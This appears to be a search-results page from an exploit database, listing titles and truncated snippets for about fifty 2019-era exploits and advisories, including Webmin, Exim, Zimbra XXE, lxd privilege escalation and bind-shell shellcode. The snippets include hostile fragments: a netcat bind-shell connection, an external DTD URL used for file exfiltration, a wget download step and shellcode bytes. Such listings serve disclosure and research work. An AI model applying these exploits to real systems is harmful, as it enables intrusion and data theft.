39001 matches found
Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting Vulnerability
Exploit for jsp platform in category web applications Exploit Title: Liferay Portal ” / or ” /. A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability. Poc In a sample scenario of custom code calling the ” /...
Webmin 1.910 - (Package Updates) Remote Command Execution Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Webmin %q This module exploits an arbitrary command execution vulnerability in Webmin 1.910 and lower versions. Any user authorized to the "Packa...
ProShow 9.0.3797 - Local Privilege Escalation Exploit
Exploit for windows platform in category local exploits !/usr/bin/python coding:utf-8 Exploit Title: ProShow v9.0.3797 Local Exploit Exploit Author: @YonatanCorrea website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html Vendor Homepage:...
Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)
;Title: Linux/x8664 - Bind 4444/TCP Shell /bin/sh 104 bytes ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 104 bytes ;github = https://github.com/STARRBOY ;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"...
WordPress Insert or Embed Articulate Content Plugin - Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: Authenticated code execution in insert-or-embed-articulate-content-into-wordpress Wordpress plugin Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive Exploit Author:...
Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) #Shellcode (131 bytes)
Exploit for linux/x86-64 platform in category shellcode ;Title: Linux/x8664 - Bind 4444/TCP Shell /bin/sh ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 131 bytes ;github = https://github.com/STARRBOY ;test shellcode = after you run the shellcode, open another terminal and...
Ubuntu 18.04 - (lxd) Privilege Escalation Exploit #LPE #RCE
Exploit for linux platform in category local exploits !/usr/bin/env bash ---------------------------------- Authors: Marcelo Vazquez S4vitar Victor Lasa vowkin ---------------------------------- Step 1: Download build-alpine = wget...
UliCMS 2019.1 Spitting Lama - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting Google Dork: intext:"by UliCMS" Exploit Author: Unk9vvN Vendor Homepage: https://en.ulicms.de Software Link:...
Exim 4.87 < 4.91 - (Local / Remote) Command Execution Exploit
Qualys Security Advisory The Return of the WIZard: RCE in Exim CVE-2019-10149 ======================================================================== Contents ======================================================================== Summary Local exploitation Remote exploitation - Non-default...
Supra Smart Cloud TV - openLiveURL() Remote File Inclusion Vulnerability
Exploit for hardware platform in category web applications Supra Smart Cloud TV - 'openLiveURL' Remote File Inclusion Exploit Author: Dhiraj Mishra Vendor Homepage: https://supra.ru Software Link: https://supra.ru/catalog/televizory/televizorsuprastvlc40lt0020f/ CVE: CVE-2019-12477 References:...
Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)
;Title: Linux/x8664 - Bind 4444/TCP Shell /bin/sh ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 131 bytes ;github = https://github.com/STARRBOY ;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444" ================== ASSEMB...
Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3) Exploit
Exploit for windows platform in category local exploits Microsoft Windows - AppX Deployment Service Local Privilege Escalation 3 CVE-2019-0841 BYPASS 2 There is a second bypass for CVE-2019-0841. This can be triggered as following: Delete all files and subfolders within...
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution Vulnerability
Exploit for linux platform in category local exploits by Arminius @rawsec Vim/Neovim Arbitrary Code Execution via Modelines ================================================= Product: Vim 8.1.1365, Neovim 0.3.6 Type: Arbitrary Code Execution CVE: CVE-2019-12735 Date: 2019-06-04 Author: Arminius...
Nvidia GeForce Experience Web Helper - Command Injection Exploit
Exploit for windows platform in category local exploits //Send request to local GFE server function submitRequestport,secret var xhr = new XMLHttpRequest; xhr.open"POST", "http://127.0.0.1:"+port+"/gfeupdate/autoGFEInstall/", true; xhr.setRequestHeader"Accept",...
Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery Vulnerability
Exploit for jsp platform in category web applications Zimbra |";int c;while c = in.read != -1 out.printcharc;in.close;out.print"|' printbaseurl dtd file url dtdurl="https://k8gege.github.io/zimbra.dtd" """ " !ENTITY % all "!ENTITY fileContents '%start;...
Zoho ManageEngine ServiceDesk Plus 9.3 - (PurchaseRequest.do) Cross-Site Scripting Vulnerability
Exploit for java platform in category web applications Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage: https://www.manageengine.com/products/service-desk Version: Zoho...
LibreNMS - addhost Command Injection Exploit
This Metasploit module exploits a command injection vulnerability in the open source network management software known as LibreNMS. The community parameter used in a POST request to the addhost functionality is unsanitized. This parameter is later used as part of a shell command that gets passed ...
Google Chrome 73.0.3683.103 - WasmMemoryObject::Grow Use-After-Free Exploit
Google Chrome 73.0.3683.103 - WasmMemoryObject::Grow Use-After-Free Exploit memoryobject, uint32t pages ... Handle newbuffer; if oldbuffer-isshared // Adjust protections for the buffer. if !AdjustBufferPermissionsisolate, oldbuffer, newsize return -1; void backingstore = oldbuffer-backingstore; i...
Inateck 2.4 GHz Wearable Wireless Presenter WP2002 Keystroke Injection Vulnerability
Product: 2.4 GHz Wearable Wireless Presenter WP2002 Manufacturer: Inateck Affected Versions: n/a Tested Versions: n/a Vulnerability Type: Insufficient Verification of Data Authenticity CWE-345 Keystroke Injection Vulnerability Risk Level: High Solution Status: Open Manufacturer Notification:...
DVD X Player 5.5 Pro - Local Buffer Overflow (SEH) Exploit
Exploit for windows platform in category local exploits Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH Exploit Author: Kevin Randall Vendor Homepage: http://www.dvd-x-player.com/download.htmldvdPlayer Software Link: http://www.dvd-x-player.com/download.htmldvdPlayer Version: 5.5...
IceWarp 10.4.4 - Local File Inclusion Vulnerability
Exploit for php platform in category web applications Exploit Title: IceWarp =10.4.4 local file include Exploit Author: JameelNabbo Website: uitsec.com Vendor Homepage: http://www.icewarp.com Software Link: https://www.icewarp.com/downloads/trial/ Version: 10.4.4 Tested on: Windows 10 CVE:...
IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Exploit
This Metasploit module exploits untrusted serialized data processed by the WAS DMGR Server and Cells in the IBM Websphere Application Server. NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset. This module requires Metasploit:...
Zoho ManageEngine ServiceDesk Plus 9.3 - (SiteLookup.do) Cross-Site Scripting Vulnerability
Exploit for java platform in category web applications Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage: https://www.manageengine.com/products/service-desk Version: Zoho...
Zoho ManageEngine ServiceDesk Plus 9.3 - (SolutionSearch.do) Cross-Site Scripting Vulnerability
Exploit for java platform in category web applications Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage: https://www.manageengine.com/products/service-desk Version: Zoho...
Zoho ManageEngine ServiceDesk Plus 9.3 - (SearchN.do) Cross-Site Scripting Vulnerability
Exploit for java platform in category web applications Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage: https://www.manageengine.com/products/service-desk Version: Zoho...
Logitech R700 Laser Presentation Remote Keystroke Injection Vulnerability
Product: R700 Laser Presentation Remote Manufacturer: Logitech Affected Versions: Model R-R0010 PID WD904XM and PID WD802XM Tested Versions: Model R-R0010 PID WD904XM and PID WD802XM Vulnerability Type: Insufficient Verification of Data Authenticity CWE-345 Keystroke Injection Vulnerability Risk...
Inateck 2.4 GHz Wireless Presenter WP1001 Keystroke Injection Vulnerability
Product: 2.4 GHz Wireless Presenter WP1001 Manufacturer: Inateck Affected Versions: Rev. v1.3C Tested Versions: Rev. v1.3C Vulnerability Type: Insufficient Verification of Data Authenticity CWE-345 Keystroke Injection Vulnerability Risk Level: High Solution Status: Open Manufacturer Notification:...
NUUO NVRMini 2 3.9.1 - (sscanf) Stack Overflow Exploit
!/usr/bin/python Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow Google Dork: n/a Date: Advisory Published: Nov 18 Exploit Author: @0x00string Vendor Homepage: nuuo.com Software Link: https://www.nuuo.com/ProductNode.php?node=2 Version: 3.9.1 and prior Tested on: 3.9.1 CVE :...
Cisco RV130W 1.0.3.44 - Remote Stack Overflow Exploit
!/usr/bin/python Exploit Title: Cisco RV130W Remote Stack Overflow Google Dork: n/a Date: Advisory Published: Feb 2019 Exploit Author: @0x00string Vendor Homepage: cisco.com Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html Version...
AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control
Exploit for hardware platform in category web applications Exploit Title: AUO Solar Data Recorder - Incorrect Access Control Exploit Author: Luca.Chiou Vendor Homepage: https://www.auo.com/zh-TW Version: AUO Solar Data Recorder all versions prior to v1.3.0 Tested on: It is a proprietary devices:...
KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities
Exploit for php platform in category web applications Exploit Title: Dell Kace Appliance Multiple Vulnerabilities Exploit Author: SlidingWindow, Twitter: @kapilkhot Vendor Homepage: https://www.quest.com/products/kace-systems-management-appliance/ Affected Versions: KACE SMA versions prior to...
ZyXEL P-660HN-T1 V2 Missing Authentication / Password Disclosure Vulnerabilities
Exploit for hardware platform in category web applications Description: The rpWLANRedirect.asp ASP page is accessible without authentication on ZyXEL P-660HN-T1 V2 2.00AAKK.3 devices. After accessing the page, the admin user's password can be obtained by viewing the HTML source code, and the...
WordPress Form Maker 1.13.3 Plugin - SQL Injection Exploit
Exploit for php platform in category web applications -- coding: utf-8 -- Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://10web.io/plugins/ Software Link: https://wordpress.org/plugins/form-maker/ Version:...
Safari Webkit Proxy Object Type Confusion Exploit
This Metasploit module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the...
Microsoft Windows Remote Desktop - BlueKeep Denial of Service Exploit
import socket, sys, struct from OpenSSL import SSL from impacket.structure import Structure I'm not responsible for what you use this to accomplish and should only be used for education purposes Could clean these up since I don't even use them class TPKTStructure: commonHdr = 'Version','B=3',...
Serv-U FTP Server 15.1.6.25 Local Privilege Escalation Vulnerability
Exploit for multiple platform in category local exploits CVE: CVE-2018-19999 Security researcher: Chris Moberly @ The Missing Link Security Product name: Serv-U FTP Server Product version: Tested on 15.1.6.25 current as of Dec 2018 Fixed in: 15.1.7 Overview The Serv-U FTP Server is vulnerable to...
Microsoft Windows 8.1 / Server 2012 - Win32k.sys Local Privilege Escalation (MS14-058) Exploit
Exploit for windows platform in category local exploits include "hd.h" // EDB Note Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945.rar byte scode= 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 , 0x...
Siemens LOGO! 8 Hard-Coded Cryptographic Key Vulnerability
Due to the use of a hard-coded cryptographic key, an attacker can put the integrity and confidentiality of encrypted data of all Siemens LOGO! 8 PLCs using this key at risk, for instance decrypting network communication during a man-in-the-middle attack. Siemens LOGO! 8 Hard-Coded Cryptographic K...
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL Exploit
The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm and possibly others: When kgslmementrydestroy in drivers/gpu/msm/kgsl.c is called for a writable entry with memtype KGSLMEMENTRYUSER, it attempts to mark the entry's pages as dirty...
Siemens LOGO! 8 Missing Authentication Vulnerability
Due to storing passwords in a recoverable format on Siemens LOGO! 8 PLCs, an attacker can gain access to configured passwords as cleartext. Siemens LOGO! 8 Missing Authentication Vulnerability Product: LOGO! Manufacturer: Siemens Affected Versions: LOGO! 8 all versions Tested Versions: LOGO! 8,...
Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2) Exploit
Exploit for windows platform in category local exploits Microsoft Windows - AppX Deployment Service Local Privilege Escalation 2 Exploit There is still a vuln in the code triggered by CVE-2019-0841 The bug that this guy found:...
Siemens LOGO! 8 Recoverable Password Format Vulnerability
Due to storing passwords in a recoverable format on Siemens LOGO! 8 PLCs, an attacker can gain access to configured passwords as cleartext. Siemens LOGO! 8 Recoverable Password Format Vulnerability Product: LOGO! Manufacturer: Siemens Affected Versions: LOGO! 8 all versions Tested Versions: LOGO!...
Oracle Application Testing Suite WebLogic Server Administration Console War Deployment Exploit
This Metasploit module abuses a feature in WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required, however by default, Oracle ships with a "oats" account that you could log in with, which grants you...
Cyberoam Transparent Authentication Suite 2.1.2.5 NetBIOS Name / FQDN Denial Of Service Exploit
Cyberoam Transparent Authentication Suite version 2.1.2.5 Fully Qualified Domain Name and NetBIOS Name proof of concept denial of service exploits. Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service PoC Discovery by: Victor Mondragón...
CMS Made Simple 2.2.10 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications ============================================= MGC ALERT 2019-002 - Original release date: April 10, 2019 - Last revised: May 22, 2019 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 CVSS Base Score - CVE-ID: CVE-2019-11226...
Deltek Maconomy 2.2.5 Local File Inclusion Vulnerability
Exploit for cgi platform in category web applications Exploit Title: Maconomy Erp local file include Exploit Author: JameelNabbo Website: jameelnabbo.com Vendor Homepage: https://www.deltek.com Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy CVE: CVE-2019-12314 POC: POC:...
JavaScript V8 Turbofan Out-Of-Bounds Read Exploit
V8: Turbofan may read a Map pointer out-of-bounds when optimizing Reflect.construct The following JavaScript program found through fuzzing triggers an assertion failure in debug builds of the latest v8 and the current release branch, 7.2.502.28: function farg const o =...
EquityPandit 1.0 - Password Disclosure Vulnerability
Exploit for Android platform in category local exploits...
Cyberoam General Authentication Client 2.1.2.7 Server Address Denial Of Service Exploit
Exploit Title: Cyberoam General Authentication Client 2.1.2.7 - Denial of Service PoC Discovery by: Victor Mondragón Vendor Homepage: https://www.cyberoam.com Software Link: https://download.cyberoam.com/solution/optionals/i18n/Cyberoam%20General%20Authentication%20Client%202.1.2.7.zip Tested...
Phraseanet < 4.0.7 - Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit title: Stored XSS vulnerability in Phraseanet DAM Open Source software Exploit Author: Krzysztof Szulski Vendor Homepage: https://www.phraseanet.com Software Link also VM: https://www.phraseanet.com/en/download/ Version affected:...